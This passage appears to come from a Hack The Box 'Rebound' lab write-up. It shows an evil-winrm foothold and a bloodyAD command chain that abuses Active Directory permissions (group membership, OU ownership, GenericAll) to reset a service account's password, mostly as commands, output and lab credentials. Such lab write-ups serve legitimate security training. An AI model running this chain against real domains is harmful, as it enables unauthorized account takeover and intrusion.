WinRM
Authenticating to the target WinRM server with the updated credential of the winrm_svc account
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ evil-winrm -i $IP -u winrm_svc -p Qwer1234
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc
*evil-winrm* ps c:\Users\winrm_svc\Documents> hostname
dc01
*evil-winrm* ps c:\Users\winrm_svc\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.11.231
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : 10.10.10.2Initial Foothold established to the target system as the winrm_svc user via WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' 'CN=oorend,CN=Users,DC=rebound,DC=htb' ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set owner 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
[!] S-1-5-21-4078382237-1492182817-2568127209-7682 is already the owner, no modification will be made
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb
[+] Password changed successfully!One-liner